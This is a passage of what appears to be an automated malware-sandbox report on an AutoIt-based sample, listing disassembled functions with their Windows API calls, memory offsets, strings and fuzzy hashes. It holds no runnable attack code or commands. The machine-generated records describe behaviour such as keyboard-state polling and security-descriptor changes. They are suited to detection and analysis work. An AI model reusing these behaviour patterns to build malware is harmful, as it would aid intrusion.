                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                    • String ID: *.*
                    • API String ID: 34673085-438819550
                    • Opcode ID: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                    • Instruction ID: 10236f58b22e865524a930ea0bffd234cfa1b7aa801403e7c21d0ad300ebd4cc
                    • Opcode Fuzzy Hash: 211fd79fc0802dac6a6a34b3d7424c0bb7bf5f245668f8c351fd34415753d4a2
                    • Instruction Fuzzy Hash: B2816EB16042419FCB34DF64C845AEBB7E8BB88310F19882AF889C7251F678ED45CB52
                    Function 007DC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00752612: GetWindowLongW.USER32(?,000000EB), ref: 00752623
                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007DC4EC
                    • GetFocus.USER32 ref: 007DC4FC
                    • GetDlgCtrlID.USER32(00000000), ref: 007DC507
                    • _memset.LIBCMT ref: 007DC632
                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 007DC65D
                    • GetMenuItemCount.USER32(?), ref: 007DC67D
                    • GetMenuItemID.USER32(?,00000000), ref: 007DC690
                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 007DC6C4
                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 007DC70C
                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007DC744
                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 007DC779
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                    • String ID: 0
                    • API String ID: 1296962147-4108050209
                    • Opcode ID: 80495c6fe1fb4323ce1d031215b753852bd145bf6069b1e780b95359bc722ab1
                    • Instruction ID: 27de6a99f1002f07cce8533be1a90319b1d23759b4c4341f981da33bbdbe7a1b
                    • Opcode Fuzzy Hash: 80495c6fe1fb4323ce1d031215b753852bd145bf6069b1e780b95359bc722ab1
                    • Instruction Fuzzy Hash: 42817D702083029FD711CF14D984AAABBF8FF88364F14452EF99697391D778E915CBA2
                    Function 007A83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007A8766
                      • Part of subcall function 007A874A: GetLastError.KERNEL32(?,007A822A,?,?,?), ref: 007A8770
                      • Part of subcall function 007A874A: GetProcessHeap.KERNEL32(00000008,?,?,007A822A,?,?,?), ref: 007A877F
                      • Part of subcall function 007A874A: HeapAlloc.KERNEL32(00000000,?,007A822A,?,?,?), ref: 007A8786
                      • Part of subcall function 007A874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007A879D
                      • Part of subcall function 007A87E7: GetProcessHeap.KERNEL32(00000008,007A8240,00000000,00000000,?,007A8240,?), ref: 007A87F3
                      • Part of subcall function 007A87E7: HeapAlloc.KERNEL32(00000000,?,007A8240,?), ref: 007A87FA
                      • Part of subcall function 007A87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007A8240,?), ref: 007A880B
                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007A8458
                    • _memset.LIBCMT ref: 007A846D
                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007A848C
                    • GetLengthSid.ADVAPI32(?), ref: 007A849D
                    • GetAce.ADVAPI32(?,00000000,?), ref: 007A84DA
                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007A84F6
                    • GetLengthSid.ADVAPI32(?), ref: 007A8513
                    • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007A8522
                    • HeapAlloc.KERNEL32(00000000), ref: 007A8529
                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007A854A
                    • CopySid.ADVAPI32(00000000), ref: 007A8551
                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007A8582
                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007A85A8
                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007A85BC
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                    • String ID:
                    • API String ID: 3996160137-0
                    • Opcode ID: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                    • Instruction ID: e0af3210518d0ca78817d357786a58909e8c6939788d2110f6f4354563fc9d1e
                    • Opcode Fuzzy Hash: 60ded839844a243f36295616accd048432d9716884df32fd0de8544cb347d84a
                    • Instruction Fuzzy Hash: B2614C71900209EBDF44DF94DC45AAEBBB9FF45300F04826AF815A7291DB399A25CF61
                    Function 007C762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetDC.USER32(00000000), ref: 007C76A2
                    • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 007C76AE
                    • CreateCompatibleDC.GDI32(?), ref: 007C76BA
                    • SelectObject.GDI32(00000000,?), ref: 007C76C7
                    • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 007C771B
                    • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 007C7757
                    • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 007C777B
                    • SelectObject.GDI32(00000006,?), ref: 007C7783
                    • DeleteObject.GDI32(?), ref: 007C778C
                    • DeleteDC.GDI32(00000006), ref: 007C7793
                    • ReleaseDC.USER32(00000000,?), ref: 007C779E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                    • String ID: (
                    • API String ID: 2598888154-3887548279
                    • Opcode ID: ebfcb87e7b7236a64e76b28ccffd2dbcc04a63cbe33bd36894d2962f69e8beb5
                    • Instruction ID: b3614256bf291b747c1f0184ff52214dd706cae0265d9baa997120161b5836fc
                    • Opcode Fuzzy Hash: ebfcb87e7b7236a64e76b28ccffd2dbcc04a63cbe33bd36894d2962f69e8beb5
                    • Instruction Fuzzy Hash: 98511975904209EFCB15CFA8CC85EAEBBB9EF48710F14C52EE95AA7210D635A940CB64
                    Function 00756BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00770B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00756C6C,?,00008000), ref: 00770BB7
                      • Part of subcall function 007548AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007548A1,?,?,007537C0,?), ref: 007548CE
                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00756D0D
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00756E5A
                      • Part of subcall function 007559CD: _wcscpy.LIBCMT ref: 00755A05
                      • Part of subcall function 0077387D: _iswctype.LIBCMT ref: 00773885
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                    • API String ID: 537147316-1018226102
                    • Opcode ID: 20f645cbabf8af55791e94dd08496ef1009c5891c3a8ea256487184b48dec642
                    • Instruction ID: 9239c05e2fe13333701ce700d7bd836d7ba83b836f74fc69fda7e89d5f3c1059
                    • Opcode Fuzzy Hash: 20f645cbabf8af55791e94dd08496ef1009c5891c3a8ea256487184b48dec642
                    • Instruction Fuzzy Hash: BA02CD71108340DFC724EF24C895AAFBBE5BF88354F44491DF88A932A1DB78E949CB52
                    Function 007545DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007545F9
                    • GetMenuItemCount.USER32(00816890), ref: 0078D7CD
                    • GetMenuItemCount.USER32(00816890), ref: 0078D87D
                    • GetCursorPos.USER32(?), ref: 0078D8C1
                    • SetForegroundWindow.USER32(00000000), ref: 0078D8CA
                    • TrackPopupMenuEx.USER32(00816890,00000000,?,00000000,00000000,00000000), ref: 0078D8DD
                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0078D8E9
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                    • String ID:
                    • API String ID: 2751501086-0
                    • Opcode ID: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                    • Instruction ID: 7cd754ed6b35dc6b4844eeb7e91eb3d36f1e19f66a0671aa032bad9f8317c987
                    • Opcode Fuzzy Hash: a757584ca19566f1544b46723356782615c9750aebfccd9445fc5b71c760cf17
                    • Instruction Fuzzy Hash: C4714630681205BEEB309F24DC49FEABF65FF04368F244216F925A61E1C7B96C60DB94
                    Function 007C8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                    Download Yara Rule
                    APIs
                    • VariantInit.OLEAUT32(?), ref: 007C8BEC
                    • CoInitialize.OLE32(00000000), ref: 007C8C19
                    • CoUninitialize.OLE32 ref: 007C8C23
                    • GetRunningObjectTable.OLE32(00000000,?), ref: 007C8D23
                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 007C8E50
                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,007E2C0C), ref: 007C8E84
                    • CoGetObject.OLE32(?,00000000,007E2C0C,?), ref: 007C8EA7
                    • SetErrorMode.KERNEL32(00000000), ref: 007C8EBA
                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 007C8F3A
                    • VariantClear.OLEAUT32(?), ref: 007C8F4A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                    • String ID: ,,~
                    • API String ID: 2395222682-1083855107
                    • Opcode ID: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                    • Instruction ID: 01d299d548d6c5a4786b559b14785818bc7fd9747a79c466d26a0dd40b9e559d
                    • Opcode Fuzzy Hash: bfe972e247bc41af42d852337b92e197181e4cad960ba48bed970796b57a77df
                    • Instruction Fuzzy Hash: D1C134B1608305EFC740DF24C884E6AB7E9BF89348F00496DF98A9B251DB75ED05CB62
                    Function 007D10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007D0038,?,?), ref: 007D10BC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 3afa9060557cc30c4c7b7bfbd4761024ab6e33591f3fefd496ecd3f119148bb3
                    • Instruction ID: 4e436fa7cc51ca61a602a2a7f15de7bfb0c52615e7e7477464fdb72afd33622d
                    • Opcode Fuzzy Hash: 3afa9060557cc30c4c7b7bfbd4761024ab6e33591f3fefd496ecd3f119148bb3
                    • Instruction Fuzzy Hash: 9F414D3025024EDBCF20EFA0DC95AEA3734FF15340F908455FD959B292DB79A95ACBA0
                    Function 007B5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00757D2C: _memmove.LIBCMT ref: 00757D66
                      • Part of subcall function 00757A84: _memmove.LIBCMT ref: 00757B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007B55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007B55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007B55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007B560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007B561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                    • Instruction ID: 8eaf4428a8d9c1057cce06ac70a7ef8da00c0f33fa8da1670df14a3c9ac2a75f
                    • Opcode Fuzzy Hash: c75809651b282d0d6947431f7be0d0c2fb414035293452cb9de10d49af63b616
                    • Instruction Fuzzy Hash: A5118220A50269B9E728A675DC4AEFFBB7CFF95F01F400469B811E21D1EEA81D09C5A1
                    Function 007B48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: f0d5c080b2c24940e20a82065e859e3265929ec9367fda014f908c2a567b7d42
                    • Instruction ID: e90cff8d363b4489c2c07fd58f9fc008c22421eb22405aa41a0046911c78a3bf
                    • Opcode Fuzzy Hash: f0d5c080b2c24940e20a82065e859e3265929ec9367fda014f908c2a567b7d42
                    • Instruction Fuzzy Hash: 2911D232904115EBCB24AB249C0AFDB77BCDB01760F0481B6F44996192EF7CAA819B61
                    Function 007B5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 007B521C
                      • Part of subcall function 00770719: timeGetTime.WINMM(?,7694B400,00760FF9), ref: 0077071D
                    • Sleep.KERNEL32(0000000A), ref: 007B5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 007B526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 007B528E
                    • SetActiveWindow.USER32 ref: 007B52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007B52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 007B52DA
                    • Sleep.KERNEL32(000000FA), ref: 007B52E5
                    • IsWindow.USER32 ref: 007B52F1
                    • EndDialog.USER32(00000000), ref: 007B5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                    • Instruction ID: 1f5e5612de6bc84f238b005ecc58d5b8f02c67d21c798e9073809516c1763d75
                    • Opcode Fuzzy Hash: d5d6359046e3de7108ec0128d41e86bcd4157a960aaab0c6012ccff4701da7cd
                    • Instruction Fuzzy Hash: DD216FB0206704EFE7015B60ED89BE63B7EFB54386F089429F102822B1DB799D508B66
                    Function 007BD7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00759997: __itow.LIBCMT ref: 007599C2
                      • Part of subcall function 00759997: __swprintf.LIBCMT ref: 00759A0C
                    • CoInitialize.OLE32(00000000), ref: 007BD855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 007BD8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 007BD8FC
                    • CoCreateInstance.OLE32(007E2D7C,00000000,00000001,0080A89C,?), ref: 007BD948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 007BD9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 007BDA0F
                    • _memset.LIBCMT ref: 007BDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 007BDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 007BDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 007BDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 007BDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 007BDAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: d5694dd5802f3e8db4024f642bb38a0c861f598dd2e20e25472451f97aa33725
                    • Instruction ID: e0d6fd526cb851e5b97d9a2af5a7f453b51f798015fa69b4b40f37dd22f411b1
                    • Opcode Fuzzy Hash: d5694dd5802f3e8db4024f642bb38a0c861f598dd2e20e25472451f97aa33725
                    • Instruction Fuzzy Hash: ACB10A75A00108EFDB14DFA4C888EAEBBB9FF48315B148469F90AEB251DB74ED45CB50
                    Function 007B052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 007B05A7
                    • SetKeyboardState.USER32(?), ref: 007B0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 007B0632
                    • GetKeyState.USER32(000000A0), ref: 007B0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 007B0678
                    • GetKeyState.USER32(000000A1), ref: 007B0689
                    • GetAsyncKeyState.USER32(00000011), ref: 007B06B5
                    • GetKeyState.USER32(00000011), ref: 007B06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 007B06EC
                    • GetKeyState.USER32(00000012), ref: 007B06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 007B0723
                    • GetKeyState.USER32(0000005B), ref: 007B0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                    • Instruction ID: ec384e3dae67a16c38cbc7f1793013f2f86f244beb04860638577318896dad61
                    • Opcode Fuzzy Hash: 481b3e5c3c5be9d55598ea0ce36828777a88ad75917729f8d64ce8f0b343a12b
                    • Instruction Fuzzy Hash: AD51EB20A0478859FF35DBB08455BEBBFB49F01380F48859AD5C2565C2DA6CAB4CCBE1
                    Function 007AC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 007AC746
                    • GetWindowRect.USER32(00000000,?), ref: 007AC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 007AC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 007AC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 007AC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 007AC827
                    • GetDlgItem.USER32(?,000003E9), ref: 007AC835
                    • GetWindowRect.USER32(00000000,?), ref: 007AC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 007AC889
                    • GetDlgItem.USER32(?,000003EA), ref: 007AC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 007AC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007AC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
